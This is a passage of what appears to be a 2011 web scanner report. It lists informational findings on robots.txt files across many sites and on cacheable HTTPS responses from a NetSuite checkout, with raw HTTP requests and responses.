Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:06:18 GMT
Connection: close
Content-Length: 111

...User-agent: *
Disallow:
Crawl-delay: 5
Disallow: /cgi-bin/
Sitemap: http://www.dmca.com.com/sitemap.xml
30.65. http://www.elineaccessories.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elineaccessories.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elineaccessories.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:49:06 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 16:00:06 GMT
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.66. http://www.fiddler2.com/fiddler2/updatecheck.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fiddler2.com
Path:   /fiddler2/updatecheck.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fiddler2.com

Response

HTTP/1.1 200 OK
Content-Length: 214
Content-Type: text/plain
Content-Location: http://www.fiddler2.com/robots.txt
Last-Modified: Mon, 07 Jul 2008 16:23:49 GMT
Accept-Ranges: bytes
ETag: "4b9ca2d64de0c81:243"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 18:46:11 GMT
Connection: close

...# Mon, 07 Jul 2008 16:23:09 +0000
# Exclude Files From All Robots:
User-agent: *
Disallow: /favecave/
Disallow: /bbs_disabled_by_crystaltech/
Disallow: /CGI-BIN/
Disallow: /test/

# End rob
...[SNIP]...
30.67. http://www.gartner.com/DisplayDocument  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /DisplayDocument

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: Close
Content-type: text/plain
Last-modified: Tue, 18 Jan 2011 21:15:30 GMT
Date: Mon, 25 Apr 2011 12:10:49 GMT
Content-Length: 1129
ETag: "pv32d6cbe24ccfa11263b07ca258ef7257"
Expires: Wed, 27 Apr 2011 12:10:49 GMT
Age: 2080
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S10101.C10821.A150986.RA0.G24F27.U2AE07660].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=3d1d2dfcfff196d359e2ca52a278baafb490c0454f080e824db564c8; Path=/

# robots.txt for http://www.gartner.com/    
# Updated: 18 Jan 2011    
User-agent: *
Disallow:/0_admin/PasswordRequest.jsp
Disallow:/0_admin/adm_help.jsp
Disallow:/2_events/audioconferences/
Disallow:/2_ev
...[SNIP]...
30.68. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 25 Apr 2011 12:01:22 GMT
Expires: Mon, 25 Apr 2011 12:01:22 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
30.69. http://www.googleadservices.com/pagead/conversion/1072501689/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1072501689/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:12:13 GMT
Expires: Mon, 25 Apr 2011 12:12:13 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
30.70. http://www.hackerguardian.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hackerguardian.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hackerguardian.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:28:39 GMT
Server: Apache
Last-Modified: Tue, 14 Oct 2008 09:47:30 GMT
ETag: "13fd5-2e4-45933810a9080"
Accept-Ranges: bytes
Content-Length: 740
Connection: close
Content-Type: text/plain

...User-agent: *
Disallow: /javascript/
Disallow: /ssl-certificate-support/
Disallow: /live-support.html
Disallow: /digital-ssl-certificate.html
Disallow: /confidence_pak.html
Disallow: /cvc.htm
...[SNIP]...
30.71. http://www.igotyourindex.com/igyindex.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igotyourindex.com
Path:   /igyindex.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.igotyourindex.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 22 Mar 2011 16:50:10 GMT
ETag: "1fb0a6a-17-49f150989d480"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.72. http://www.internetreputationmanagement.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internetreputationmanagement.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.internetreputationmanagement.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:08 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 17:31:30 GMT
ETag: "1f4444a-659-49fa26e3f4080"
Accept-Ranges: bytes
Content-Length: 1625
Cache-Control: max-age=1209600
Expires: Mon, 09 May 2011 15:53:08 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.73. http://www.iveco-ptc.spb.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iveco-ptc.spb.ru
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iveco-ptc.spb.ru

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:49 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Tue, 19 Apr 2011 09:32:23 GMT
ETag: "205e87-dc-4a1422f75b7c0"
Accept-Ranges: bytes
Content-Length: 220

User-agent: *
Disallow: /home
Disallow: /infor.html
Disallow: /catalog-detail-1/u/1/1
Disallow: /catalog-detail-1/n/10
Disallow: /catalog-detail-1/u/1/5
Disallow: /404
Disallow: /*?_openstat=*
Host: w
...[SNIP]...
30.74. http://www.kayako.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayako.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kayako.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:40:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Feb 2011 18:11:04 GMT
ETag: "311800c-c2-49b78ce28be00"
Accept-Ranges: bytes
Content-Length: 194
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.kayako.com/sitemap.xml
Disallow: /ie/
Disallow: /js/
Disallow: path.php
Disallow: /signup/ondemand/
Disallow: /signup/download/
Allow: /
Allow: /signup/
30.75. http://www.livejournal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:56 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
X-AWS-Id: ws47
Last-Modified: Wed, 01 Sep 2010 19:32:58 GMT
ETag: "150b1e0-1b6-48f37c3cfee80"
Accept-Ranges: bytes
Content-Length: 438
X-Varnish: 596074119
Age: 0
Via: 1.1 varnish

User-Agent: *
Disallow: /directory.bml

Sitemap: http://www.livejournal.com/sitemap.xml

#
# Blocked journals aren't listed here because robots.txt files
# can't be above 50k or so, depending on the s
...[SNIP]...
30.76. http://www.manageengine.com/products/security-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manageengine.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:54 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 12:39:16 GMT
ETag: "4e7-49de3c8a16500"
Accept-Ranges: bytes
Content-Length: 1255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# ------------------------------------------
# ZOHO Corp. -- http://www.manageengine.com
# Robot Exclusion File -- robots.txt
# Author: Webmaster
# Last Updated: 16/06/10
# ------------------------
...[SNIP]...
30.77. https://www.manageengine.com/products/security-manager/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /products/security-manager/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manageengine.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:52 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 12:39:16 GMT
ETag: "4e7-49de3c8a16500"
Accept-Ranges: bytes
Content-Length: 1255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# ------------------------------------------
# ZOHO Corp. -- http://www.manageengine.com
# Robot Exclusion File -- robots.txt
# Author: Webmaster
# Last Updated: 16/06/10
# ------------------------
...[SNIP]...
30.78. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marketgid.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:35 GMT
Content-Type: text/plain
Connection: close
Content-Length: 204

User-agent: *
Disallow: /search/
Disallow: /redirect/
Disallow: /news/
Disallow: /rnews/

User-agent: Yandex
Disallow: /search/
Disallow: /redirect/
Disallow: /news/
Disallow: /rnews/
Host: marketgid.
...[SNIP]...
30.79. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /pages/portal/page_not_found.jspinternal=T

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netsuite.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 195
Content-Disposition: inline;filename="robots.txt"
NS_RTIMER_COMPOSITE: 1564598317:73686F702D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2823
Date: Mon, 25 Apr 2011 15:13:51 GMT
Connection: close

User-Agent: *
Disallow: /portal/pdf/tos.pdf

Crawl-Delay: 10
User-Agent: *
Disallow: /portal/resource/terms_of_service.shtml

User-Agent: *
Disallow: /portal/resource/terms-of-service.shtml
30.80. http://www.reputationprofessor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationprofessor.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reputationprofessor.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:04:02 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7e mod_auth_pgsql/2.0.3
X-Powered-By: PHP/4.4.9
X-Pingback: http://reputationprofessor.com/xmlrpc.php
Set-Cookie: bb2_screener_=1303747442+173.193.214.243; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://reputationprofessor.com/sitemap.xml.gz
30.81. http://www.ripoffreport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ripoffreport.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:19:42 GMT
Content-Type: text/plain; charset=win-utf
Connection: close
Last-Modified: Tue, 02 Mar 2010 18:08:20 GMT
ETag: "2ea2555733baca1:0"
ROR-NODE: 04
Content-Length: 349
Accept-Ranges: bytes

User-agent: *
Disallow: /Common/
Disallow: /Register.aspx
Disallow: /PageNotFound.aspx
Disallow: /ForgotPassword.aspx
Disallow: /CreateAccount.aspx
Disallow: /CreateUserAccount.aspx
Disallow: /
...[SNIP]...
30.82. https://www.salesforce.com/servlet/servlet.WebToLead  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.salesforce.com

Response

HTTP/1.0 200 OK
Server: SFDC
Last-Modified: Mon, 31 Jan 2011 09:38:26 GMT
Cache-Control: max-age=86400
Expires: Tue, 26 Apr 2011 06:47:31 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 11688
Date: Mon, 25 Apr 2011 16:06:12 GMT
Connection: close

# Robots.txt file for http://www.salesforce.com
# rh_24_Aug_09
# All robots will spider the domain
#
sitemap: http://www.salesforce.com/sitemapindex.xml
#
# Keep mis-configured Microsoft SharePoint se
...[SNIP]...
30.83. http://www.smpone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smpone.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 03 May 2005 10:21:00 GMT
ETag: "2060f40-18-3f63118cc3b00"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.84. http://www.tresware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tresware.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 03 May 2005 11:21:00 GMT
ETag: "1ff8873-18-3f631ef5fdf00"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.85. http://www.trucklist.ru/cars/trucks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/trucks

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trucklist.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:38:02 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 113
Last-Modified: Tue, 14 Dec 2010 10:51:53 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Disallow: /help/
Disallow: /login/
Disallow: /sign-up/
Disallow: /cars/search/
Disallow: /*field*
31. Cacheable HTTPS response  previous  next
There are 36 instances of this issue:

31.1. https://checkout.netsuite.com/c.438708/js/eset-netsuite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /c.438708/js/eset-netsuite.js

Request

GET /c.438708/js/eset-netsuite.js HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:58 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 25336
Content-Disposition: inline;filename="eset-netsuite.js"
NS_RTIMER_COMPOSITE: -1700559788:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=970
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

// Version 1.6

var ESET_Netsuite = {
currentpage: '',
locale: 'en_US',
customer: '438708',
country: 'US',

init: function() {
if($('__locale')) {
this.locale = $('__locale').get('
...[SNIP]...
31.2. https://checkout.netsuite.com/c.438708/js/lib/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /c.438708/js/lib/mbox.js

Request

GET /c.438708/js/lib/mbox.js HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303741608|session#1303736347554-914602#1303743408|PC#1303736347554-914602.17#1304951149; JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:55 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 20200
Content-Disposition: inline;filename="mbox.js"
NS_RTIMER_COMPOSITE: -260603124:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=994
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

var mboxCopyright = "&copy; 1996-2008. Omniture, Inc. All rights reserved.";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return e; }; this.f =
...[SNIP]...
31.3. https://checkout.netsuite.com/c.438708/js/lib/mootools-1.2.4-core-yc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /c.438708/js/lib/mootools-1.2.4-core-yc.js

Request

GET /c.438708/js/lib/mootools-1.2.4-core-yc.js HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303741608|session#1303736347554-914602#1303743408|PC#1303736347554-914602.17#1304951149; JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:25:55 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 66867
Content-Disposition: inline;filename="mootools-1.2.4-core-yc.js"
NS_RTIMER_COMPOSITE: -1256659311:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=970
Connection: Keep-Alive
Content-Type: application/octet-stream; charset=UTF-8

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.4",build:"0d91
...[SNIP]...
31.4. https://checkout.netsuite.com/empty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /empty.html

Request

GET /empty.html HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=session#1303736347554-914602#1303743995|PC#1303736347554-914602.17#1304951735|check#true#1303742195

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:35:25 GMT
Server: Apache
Cache-Control: private
Cache-Control: max-age=56400
Accept-Ranges: bytes
Content-Length: 168
Expires: Tue, 26 Apr 2011 06:15:25 GMT
Last-Modified: Thu, 21 Apr 2011 07:00:00 GMT
NS_RTIMER_COMPOSITE: -1598180205:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body>
</body>
</html>
31.5. https://checkout.netsuite.com/pages/portal/page_not_found.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /pages/portal/page_not_found.jsp

Request

HEAD /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:41 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 2000605877:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 0

31.6. https://checkout.netsuite.com/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /robots.txt

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 103
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: -1592275309:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:
31.7. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Request

GET /s.nl?c=438708&sc=4NS_NO&whence=3&n=1&ext=T&redirect_count=1&did_javascript_redirect=T HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=bqgtN1FCvmPZxcX2b3nD1qst0hJBbncQpX4mKyTQTv3pKCPvkLf29Tn7kwyJ26VCKpZhYV7XrhkXjJj2Gpvsp7WCw27FDpnZHWQvTGR8X2G2TXlJDxhnb90YJrRhDJ1B!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:28:52 GMT
Server: Apache
Expires: 0
Last-Modified: Mon, 25 Apr 2011 14:28:51 GMT
NS_RTIMER_COMPOSITE: -368823693:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:28:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 26741


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...
31.8. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /Default.asp

Request

HEAD /Default.asp HTTP/1.1
